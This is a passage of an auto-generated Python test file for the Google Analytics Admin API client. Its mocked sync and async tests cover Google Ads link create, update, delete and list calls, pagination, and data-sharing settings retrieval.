mock.patch.object( type(client.transport.create_google_ads_link), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GoogleAdsLink() ) await client.create_google_ads_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_create_google_ads_link_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_google_ads_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GoogleAdsLink() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.create_google_ads_link( parent="parent_value", google_ads_link=resources.GoogleAdsLink(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[0].google_ads_link == resources.GoogleAdsLink(name="name_value") def test_create_google_ads_link_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.create_google_ads_link( analytics_admin.CreateGoogleAdsLinkRequest(), parent="parent_value", google_ads_link=resources.GoogleAdsLink(name="name_value"), ) @pytest.mark.asyncio async def test_create_google_ads_link_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_google_ads_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GoogleAdsLink() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GoogleAdsLink() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.create_google_ads_link( parent="parent_value", google_ads_link=resources.GoogleAdsLink(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[0].google_ads_link == resources.GoogleAdsLink(name="name_value") @pytest.mark.asyncio async def test_create_google_ads_link_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.create_google_ads_link( analytics_admin.CreateGoogleAdsLinkRequest(), parent="parent_value", google_ads_link=resources.GoogleAdsLink(name="name_value"), ) def test_update_google_ads_link( transport: str = "grpc", request_type=analytics_admin.UpdateGoogleAdsLinkRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_ads_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GoogleAdsLink( name="name_value", customer_id="customer_id_value", can_manage_clients=True, creator_email_address="creator_email_address_value", ) response = client.update_google_ads_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateGoogleAdsLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.GoogleAdsLink) assert response.name == "name_value" assert response.customer_id == "customer_id_value" assert response.can_manage_clients is True assert response.creator_email_address == "creator_email_address_value" def test_update_google_ads_link_from_dict(): test_update_google_ads_link(request_type=dict) def test_update_google_ads_link_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_ads_link), "__call__" ) as call: client.update_google_ads_link() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateGoogleAdsLinkRequest() @pytest.mark.asyncio async def test_update_google_ads_link_async( transport: str = "grpc_asyncio", request_type=analytics_admin.UpdateGoogleAdsLinkRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_ads_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GoogleAdsLink( name="name_value", customer_id="customer_id_value", can_manage_clients=True, creator_email_address="creator_email_address_value", ) ) response = await client.update_google_ads_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateGoogleAdsLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.GoogleAdsLink) assert response.name == "name_value" assert response.customer_id == "customer_id_value" assert response.can_manage_clients is True assert response.creator_email_address == "creator_email_address_value" @pytest.mark.asyncio async def test_update_google_ads_link_async_from_dict(): await test_update_google_ads_link_async(request_type=dict) def test_update_google_ads_link_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateGoogleAdsLinkRequest() request.google_ads_link.name = "google_ads_link.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_ads_link), "__call__" ) as call: call.return_value = resources.GoogleAdsLink() client.update_google_ads_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "google_ads_link.name=google_ads_link.name/value", ) in kw["metadata"] @pytest.mark.asyncio async def test_update_google_ads_link_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateGoogleAdsLinkRequest() request.google_ads_link.name = "google_ads_link.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_ads_link), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GoogleAdsLink() ) await client.update_google_ads_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "google_ads_link.name=google_ads_link.name/value", ) in kw["metadata"] def test_update_google_ads_link_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_ads_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GoogleAdsLink() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.update_google_ads_link( google_ads_link=resources.GoogleAdsLink(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].google_ads_link == resources.GoogleAdsLink(name="name_value") assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) def test_update_google_ads_link_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.update_google_ads_link( analytics_admin.UpdateGoogleAdsLinkRequest(), google_ads_link=resources.GoogleAdsLink(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_google_ads_link_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_ads_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GoogleAdsLink() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GoogleAdsLink() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_google_ads_link( google_ads_link=resources.GoogleAdsLink(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].google_ads_link == resources.GoogleAdsLink(name="name_value") assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) @pytest.mark.asyncio async def test_update_google_ads_link_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.update_google_ads_link( analytics_admin.UpdateGoogleAdsLinkRequest(), google_ads_link=resources.GoogleAdsLink(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) def test_delete_google_ads_link( transport: str = "grpc", request_type=analytics_admin.DeleteGoogleAdsLinkRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_google_ads_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None response = client.delete_google_ads_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteGoogleAdsLinkRequest() # Establish that the response is the type that we expect. assert response is None def test_delete_google_ads_link_from_dict(): test_delete_google_ads_link(request_type=dict) def test_delete_google_ads_link_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_google_ads_link), "__call__" ) as call: client.delete_google_ads_link() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteGoogleAdsLinkRequest() @pytest.mark.asyncio async def test_delete_google_ads_link_async( transport: str = "grpc_asyncio", request_type=analytics_admin.DeleteGoogleAdsLinkRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_google_ads_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) response = await client.delete_google_ads_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteGoogleAdsLinkRequest() # Establish that the response is the type that we expect. assert response is None @pytest.mark.asyncio async def test_delete_google_ads_link_async_from_dict(): await test_delete_google_ads_link_async(request_type=dict) def test_delete_google_ads_link_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteGoogleAdsLinkRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_google_ads_link), "__call__" ) as call: call.return_value = None client.delete_google_ads_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_delete_google_ads_link_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteGoogleAdsLinkRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_google_ads_link), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) await client.delete_google_ads_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_delete_google_ads_link_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_google_ads_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.delete_google_ads_link(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_delete_google_ads_link_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.delete_google_ads_link( analytics_admin.DeleteGoogleAdsLinkRequest(), name="name_value", ) @pytest.mark.asyncio async def test_delete_google_ads_link_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_google_ads_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.delete_google_ads_link(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_delete_google_ads_link_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.delete_google_ads_link( analytics_admin.DeleteGoogleAdsLinkRequest(), name="name_value", ) def test_list_google_ads_links( transport: str = "grpc", request_type=analytics_admin.ListGoogleAdsLinksRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_google_ads_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListGoogleAdsLinksResponse( next_page_token="next_page_token_value", ) response = client.list_google_ads_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListGoogleAdsLinksRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListGoogleAdsLinksPager) assert response.next_page_token == "next_page_token_value" def test_list_google_ads_links_from_dict(): test_list_google_ads_links(request_type=dict) def test_list_google_ads_links_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_google_ads_links), "__call__" ) as call: client.list_google_ads_links() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListGoogleAdsLinksRequest() @pytest.mark.asyncio async def test_list_google_ads_links_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ListGoogleAdsLinksRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_google_ads_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListGoogleAdsLinksResponse( next_page_token="next_page_token_value", ) ) response = await client.list_google_ads_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListGoogleAdsLinksRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListGoogleAdsLinksAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_google_ads_links_async_from_dict(): await test_list_google_ads_links_async(request_type=dict) def test_list_google_ads_links_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListGoogleAdsLinksRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_google_ads_links), "__call__" ) as call: call.return_value = analytics_admin.ListGoogleAdsLinksResponse() client.list_google_ads_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_list_google_ads_links_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListGoogleAdsLinksRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_google_ads_links), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListGoogleAdsLinksResponse() ) await client.list_google_ads_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_google_ads_links_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_google_ads_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListGoogleAdsLinksResponse() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.list_google_ads_links(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" def test_list_google_ads_links_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.list_google_ads_links( analytics_admin.ListGoogleAdsLinksRequest(), parent="parent_value", ) @pytest.mark.asyncio async def test_list_google_ads_links_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_google_ads_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListGoogleAdsLinksResponse() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListGoogleAdsLinksResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_google_ads_links(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" @pytest.mark.asyncio async def test_list_google_ads_links_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.list_google_ads_links( analytics_admin.ListGoogleAdsLinksRequest(), parent="parent_value", ) def test_list_google_ads_links_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_google_ads_links), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[ resources.GoogleAdsLink(), resources.GoogleAdsLink(), resources.GoogleAdsLink(), ], next_page_token="abc", ), analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[], next_page_token="def", ), analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[resources.GoogleAdsLink(),], next_page_token="ghi", ), analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[ resources.GoogleAdsLink(), resources.GoogleAdsLink(), ], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.list_google_ads_links(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.GoogleAdsLink) for i in results) def test_list_google_ads_links_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_google_ads_links), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[ resources.GoogleAdsLink(), resources.GoogleAdsLink(), resources.GoogleAdsLink(), ], next_page_token="abc", ), analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[], next_page_token="def", ), analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[resources.GoogleAdsLink(),], next_page_token="ghi", ), analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[ resources.GoogleAdsLink(), resources.GoogleAdsLink(), ], ), RuntimeError, ) pages = list(client.list_google_ads_links(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_google_ads_links_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_google_ads_links), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[ resources.GoogleAdsLink(), resources.GoogleAdsLink(), resources.GoogleAdsLink(), ], next_page_token="abc", ), analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[], next_page_token="def", ), analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[resources.GoogleAdsLink(),], next_page_token="ghi", ), analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[ resources.GoogleAdsLink(), resources.GoogleAdsLink(), ], ), RuntimeError, ) async_pager = await client.list_google_ads_links(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.GoogleAdsLink) for i in responses) @pytest.mark.asyncio async def test_list_google_ads_links_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_google_ads_links), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[ resources.GoogleAdsLink(), resources.GoogleAdsLink(), resources.GoogleAdsLink(), ], next_page_token="abc", ), analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[], next_page_token="def", ), analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[resources.GoogleAdsLink(),], next_page_token="ghi", ), analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[ resources.GoogleAdsLink(), resources.GoogleAdsLink(), ], ), RuntimeError, ) pages = [] async for page_ in (await client.list_google_ads_links(request={})).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_get_data_sharing_settings( transport: str = "grpc", request_type=analytics_admin.GetDataSharingSettingsRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_sharing_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DataSharingSettings( name="name_value", sharing_with_google_support_enabled=True, sharing_with_google_assigned_sales_enabled=True, sharing_with_google_any_sales_enabled=True, sharing_with_google_products_enabled=True, sharing_with_others_enabled=True, ) response = client.get_data_sharing_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetDataSharingSettingsRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.DataSharingSettings) assert response.name == "name_value" assert response.sharing_with_google_support_enabled is True assert response.sharing_with_google_assigned_sales_enabled is True assert response.sharing_with_google_any_sales_enabled is True assert response.sharing_with_google_products_enabled is True assert response.sharing_with_others_enabled is True def test_get_data_sharing_settings_from_dict(): test_get_data_sharing_settings(request_type=dict) def test_get_data_sharing_settings_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_sharing_settings), "__call__" ) as call: client.get_data_sharing_settings() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetDataSharingSettingsRequest() @pytest.mark.asyncio async def test_get_data_sharing_settings_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetDataSharingSettingsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_sharing_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DataSharingSettings( name="name_value", sharing_with_google_support_enabled=True, sharing_with_google_assigned_sales_enabled=True, sharing_with_google_any_sales_enabled=True, sharing_with_google_products_enabled=True, sharing_with_others_enabled=True, ) ) response = await client.get_data_sharing_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetDataSharingSettingsRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.DataSharingSettings) assert response.name == "name_value" assert response.sharing_with_google_support_enabled is True assert response.sharing_with_google_assigned_sales_enabled is True assert response.sharing_with_google_any_sales_enabled is True assert response.sharing_with_google_products_enabled is True assert response.sharing_with_others_enabled is True @pytest.mark.asyncio async def test_get_data_sharing_settings_async_from_dict(): await test_get_data_sharing_settings_async(request_type=dict) def test_get_data_sharing_settings_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetDataSharingSettingsRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_sharing_settings), "__call__" ) as call: call.return_value = resources.DataSharingSettings() client.get_data_sharing_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_data_sharing_settings_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetDataSharingSettingsRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_sharing_settings), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DataSharingSettings() ) await client.get_data_sharing_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_data_sharing_settings_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_sharing_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DataSharingSettings() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_data_sharing_settings(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_data_sharing_settings_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_data_sharing_settings( analytics_admin.GetDataSharingSettingsRequest(), name="name_value", ) @pytest.mark.asyncio async def 